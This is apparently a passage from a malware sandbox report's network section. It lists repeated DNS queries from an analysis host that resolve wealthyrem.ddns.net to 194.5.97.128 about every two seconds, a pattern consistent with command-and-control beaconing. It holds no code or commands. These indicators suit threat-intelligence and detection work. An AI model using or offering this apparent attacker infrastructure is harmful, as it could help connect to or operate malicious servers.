                  Aug 3, 2021 19:05:41.315402031 CEST192.168.2.38.8.8.80x8b71Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:43.540107012 CEST192.168.2.38.8.8.80x8af6Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:45.754501104 CEST192.168.2.38.8.8.80x86b1Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:47.940515041 CEST192.168.2.38.8.8.80x2a2aStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:50.126950026 CEST192.168.2.38.8.8.80x278fStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:52.331804991 CEST192.168.2.38.8.8.80x62f6Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:54.534140110 CEST192.168.2.38.8.8.80x9fafStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:56.720890045 CEST192.168.2.38.8.8.80x7fccStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:58.957617998 CEST192.168.2.38.8.8.80x4bf7Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:01.144287109 CEST192.168.2.38.8.8.80xab5eStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:03.333826065 CEST192.168.2.38.8.8.80xc0e9Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:05.550487041 CEST192.168.2.38.8.8.80xc40dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:07.741825104 CEST192.168.2.38.8.8.80x3c4cStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:09.941957951 CEST192.168.2.38.8.8.80xba84Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:12.149107933 CEST192.168.2.38.8.8.80x71aaStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:15.198581934 CEST192.168.2.38.8.8.80x1519Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:17.397550106 CEST192.168.2.38.8.8.80x4316Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:19.587477922 CEST192.168.2.38.8.8.80xd753Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:21.772907972 CEST192.168.2.38.8.8.80x1990Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:23.959944010 CEST192.168.2.38.8.8.80x3edeStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:26.166287899 CEST192.168.2.38.8.8.80xe3a2Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:28.366338015 CEST192.168.2.38.8.8.80x667Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:30.600789070 CEST192.168.2.38.8.8.80xcc52Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:32.799395084 CEST192.168.2.38.8.8.80xd900Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:34.995313883 CEST192.168.2.38.8.8.80xe662Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:37.197623014 CEST192.168.2.38.8.8.80x75aStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:39.385412931 CEST192.168.2.38.8.8.80xbb11Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:41.637833118 CEST192.168.2.38.8.8.80x1152Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:43.841898918 CEST192.168.2.38.8.8.80x997cStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:46.065788031 CEST192.168.2.38.8.8.80x8a48Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:48.259576082 CEST192.168.2.38.8.8.80xc1c6Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:50.478462934 CEST192.168.2.38.8.8.80x75e3Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:52.664053917 CEST192.168.2.38.8.8.80xf2dfStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:54.869762897 CEST192.168.2.38.8.8.80x7414Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:57.063138962 CEST192.168.2.38.8.8.80x5c6fStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:59.274760008 CEST192.168.2.38.8.8.80x25b1Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:01.536617041 CEST192.168.2.38.8.8.80xa7a9Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:03.743144989 CEST192.168.2.38.8.8.80x7bc4Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:05.939706087 CEST192.168.2.38.8.8.80xbda9Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:08.149225950 CEST192.168.2.38.8.8.80x106bStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:10.377194881 CEST192.168.2.38.8.8.80x458dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:12.588496923 CEST192.168.2.38.8.8.80x33bcStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:14.790198088 CEST192.168.2.38.8.8.80x57deStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:17.232678890 CEST192.168.2.38.8.8.80x2f60Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:19.495464087 CEST192.168.2.38.8.8.80x4f1aStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:21.703489065 CEST192.168.2.38.8.8.80xba29Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:23.890366077 CEST192.168.2.38.8.8.80x412dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:26.093004942 CEST192.168.2.38.8.8.80xee6fStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:28.307390928 CEST192.168.2.38.8.8.80x2238Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:30.528975964 CEST192.168.2.38.8.8.80x26fdStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:32.768989086 CEST192.168.2.38.8.8.80x7e26Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:35.004992008 CEST192.168.2.38.8.8.80xeb55Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:37.205674887 CEST192.168.2.38.8.8.80xa36Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:39.391149044 CEST192.168.2.38.8.8.80x1bcfStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:41.593108892 CEST192.168.2.38.8.8.80x30fbStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:43.791191101 CEST192.168.2.38.8.8.80xd400Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:45.981834888 CEST192.168.2.38.8.8.80xf1d3Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:48.208339930 CEST192.168.2.38.8.8.80xeebbStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:50.405112028 CEST192.168.2.38.8.8.80x55ebStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:52.700977087 CEST192.168.2.38.8.8.80x9b87Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:54.903065920 CEST192.168.2.38.8.8.80x8ceaStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:57.106620073 CEST192.168.2.38.8.8.80xbf11Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:07:59.292171955 CEST192.168.2.38.8.8.80x1642Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:08:01.496685028 CEST192.168.2.38.8.8.80x6602Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:08:03.698606014 CEST192.168.2.38.8.8.80x2043Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Aug 3, 2021 19:01:32.150788069 CEST8.8.8.8192.168.2.30x4f55No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:34.349643946 CEST8.8.8.8192.168.2.30xc0f9No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:36.548902035 CEST8.8.8.8192.168.2.30xb853No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:38.753732920 CEST8.8.8.8192.168.2.30x4c0No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:40.941567898 CEST8.8.8.8192.168.2.30x8464No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:43.134553909 CEST8.8.8.8192.168.2.30x1298No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:45.317775965 CEST8.8.8.8192.168.2.30x2508No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:47.786495924 CEST8.8.8.8192.168.2.30x95ddNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:50.345753908 CEST8.8.8.8192.168.2.30x91d3No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:52.544380903 CEST8.8.8.8192.168.2.30x3f8eNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:54.762475014 CEST8.8.8.8192.168.2.30x64f4No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:56.959481955 CEST8.8.8.8192.168.2.30x58e4No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:59.165488958 CEST8.8.8.8192.168.2.30xae14No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:01.352756977 CEST8.8.8.8192.168.2.30x9d7bNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:03.588093042 CEST8.8.8.8192.168.2.30xf106No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:07.945453882 CEST8.8.8.8192.168.2.30xcfbcNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:10.148989916 CEST8.8.8.8192.168.2.30xb28dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:12.380321980 CEST8.8.8.8192.168.2.30xf8d3No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:14.720417976 CEST8.8.8.8192.168.2.30xabd4No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:16.986277103 CEST8.8.8.8192.168.2.30x296No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:19.246603966 CEST8.8.8.8192.168.2.30x4268No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:21.462229967 CEST8.8.8.8192.168.2.30xb8c4No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:23.651187897 CEST8.8.8.8192.168.2.30xd8c3No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:25.846793890 CEST8.8.8.8192.168.2.30xe46dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:28.050857067 CEST8.8.8.8192.168.2.30xe1a4No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:30.252289057 CEST8.8.8.8192.168.2.30x95e9No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:32.456573009 CEST8.8.8.8192.168.2.30xef1No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:34.704158068 CEST8.8.8.8192.168.2.30xb849No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:36.915652990 CEST8.8.8.8192.168.2.30x4e81No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:39.113240957 CEST8.8.8.8192.168.2.30xd3b6No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:41.475824118 CEST8.8.8.8192.168.2.30x6608No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:43.676137924 CEST8.8.8.8192.168.2.30x7d7eNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:45.884254932 CEST8.8.8.8192.168.2.30x8d99No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:48.070511103 CEST8.8.8.8192.168.2.30xbc7cNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:50.297590971 CEST8.8.8.8192.168.2.30xf886No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:52.508933067 CEST8.8.8.8192.168.2.30xffNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:54.752672911 CEST8.8.8.8192.168.2.30x7c6bNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:57.072422028 CEST8.8.8.8192.168.2.30xd11bNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:00.250510931 CEST8.8.8.8192.168.2.30x8a1bNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:02.455005884 CEST8.8.8.8192.168.2.30xa63No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:04.646204948 CEST8.8.8.8192.168.2.30x48fdNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:06.928741932 CEST8.8.8.8192.168.2.30x9167No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:09.116533041 CEST8.8.8.8192.168.2.30x62edNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:11.308238029 CEST8.8.8.8192.168.2.30xf165No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:13.514050961 CEST8.8.8.8192.168.2.30x3d90No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:15.711858988 CEST8.8.8.8192.168.2.30xf3a8No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:17.903259039 CEST8.8.8.8192.168.2.30x1e50No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:20.122246981 CEST8.8.8.8192.168.2.30xea4bNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:22.355321884 CEST8.8.8.8192.168.2.30x9268No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:24.558729887 CEST8.8.8.8192.168.2.30x2dbaNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:26.767282009 CEST8.8.8.8192.168.2.30xe4f0No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:28.955493927 CEST8.8.8.8192.168.2.30xf843No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:31.168095112 CEST8.8.8.8192.168.2.30x7112No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:33.353689909 CEST8.8.8.8192.168.2.30x5739No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:35.545561075 CEST8.8.8.8192.168.2.30x752No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:37.810373068 CEST8.8.8.8192.168.2.30xa606No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:40.006287098 CEST8.8.8.8192.168.2.30x5794No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:42.196994066 CEST8.8.8.8192.168.2.30xc21dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:44.389393091 CEST8.8.8.8192.168.2.30x50aeNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:46.604208946 CEST8.8.8.8192.168.2.30xab70No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:48.798176050 CEST8.8.8.8192.168.2.30xf7a2No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:50.985971928 CEST8.8.8.8192.168.2.30xc7d0No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:53.231578112 CEST8.8.8.8192.168.2.30x2ac8No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:55.451174021 CEST8.8.8.8192.168.2.30xdb67No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:57.659317017 CEST8.8.8.8192.168.2.30x8876No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:59.858313084 CEST8.8.8.8192.168.2.30xdd4aNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:02.451447010 CEST8.8.8.8192.168.2.30x40a4No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:05.058403969 CEST8.8.8.8192.168.2.30xc20bNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:07.278501987 CEST8.8.8.8192.168.2.30xe42aNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:09.519002914 CEST8.8.8.8192.168.2.30xba28No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:11.806792974 CEST8.8.8.8192.168.2.30xddb0No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:14.118324041 CEST8.8.8.8192.168.2.30xfeb0No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:16.308108091 CEST8.8.8.8192.168.2.30xa694No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:16.920137882 CEST8.8.8.8192.168.2.30xdfc2No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                  Aug 3, 2021 19:04:18.513947010 CEST8.8.8.8192.168.2.30xa8c7No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:20.731728077 CEST8.8.8.8192.168.2.30x5126No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:22.938019991 CEST8.8.8.8192.168.2.30xa630No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:25.258712053 CEST8.8.8.8192.168.2.30xf5bNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:27.443067074 CEST8.8.8.8192.168.2.30xc235No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:29.647238970 CEST8.8.8.8192.168.2.30x7a7cNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:32.033607960 CEST8.8.8.8192.168.2.30xd305No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:34.233795881 CEST8.8.8.8192.168.2.30x8c28No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:36.463515043 CEST8.8.8.8192.168.2.30x8a03No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:38.686813116 CEST8.8.8.8192.168.2.30x6df8No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:40.992608070 CEST8.8.8.8192.168.2.30x5512No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:43.237854958 CEST8.8.8.8192.168.2.30x346eNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:45.437777042 CEST8.8.8.8192.168.2.30xbe48No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:47.660789967 CEST8.8.8.8192.168.2.30x2dc6No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:49.880382061 CEST8.8.8.8192.168.2.30x5442No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:52.111000061 CEST8.8.8.8192.168.2.30x907dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:54.321608067 CEST8.8.8.8192.168.2.30x3c36No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:56.613110065 CEST8.8.8.8192.168.2.30x68b3No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:58.823889971 CEST8.8.8.8192.168.2.30x9bf3No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:01.053582907 CEST8.8.8.8192.168.2.30x9486No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:03.279337883 CEST8.8.8.8192.168.2.30xed32No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:05.506740093 CEST8.8.8.8192.168.2.30x26d6No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:07.727588892 CEST8.8.8.8192.168.2.30xef65No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:10.224415064 CEST8.8.8.8192.168.2.30x173bNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:12.749973059 CEST8.8.8.8192.168.2.30x71dcNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:14.958893061 CEST8.8.8.8192.168.2.30xcd49No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:17.145004988 CEST8.8.8.8192.168.2.30x954dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:19.365232944 CEST8.8.8.8192.168.2.30x4205No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:21.552804947 CEST8.8.8.8192.168.2.30x8926No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:23.757006884 CEST8.8.8.8192.168.2.30x821No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:25.959387064 CEST8.8.8.8192.168.2.30x96ceNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:28.191822052 CEST8.8.8.8192.168.2.30x4e8No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:30.381278038 CEST8.8.8.8192.168.2.30xa5e8No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:32.573491096 CEST8.8.8.8192.168.2.30x555dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:34.744133949 CEST8.8.8.8192.168.2.30x5059No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:36.961061954 CEST8.8.8.8192.168.2.30x7b1bNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:39.165993929 CEST8.8.8.8192.168.2.30x428eNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:41.342091084 CEST8.8.8.8192.168.2.30x8b71No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:43.572525024 CEST8.8.8.8192.168.2.30x8af6No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:45.787534952 CEST8.8.8.8192.168.2.30x86b1No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:47.976157904 CEST8.8.8.8192.168.2.30x2a2aNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:50.160826921 CEST8.8.8.8192.168.2.30x278fNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:52.357184887 CEST8.8.8.8192.168.2.30x62f6No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:54.568398952 CEST8.8.8.8192.168.2.30x9fafNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:56.756485939 CEST8.8.8.8192.168.2.30x7fccNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:58.990415096 CEST8.8.8.8192.168.2.30x4bf7No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                  Aug 3, 2021 19:06:01.181267023 CEST8.8.8.8192.168.2.30xab5eNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
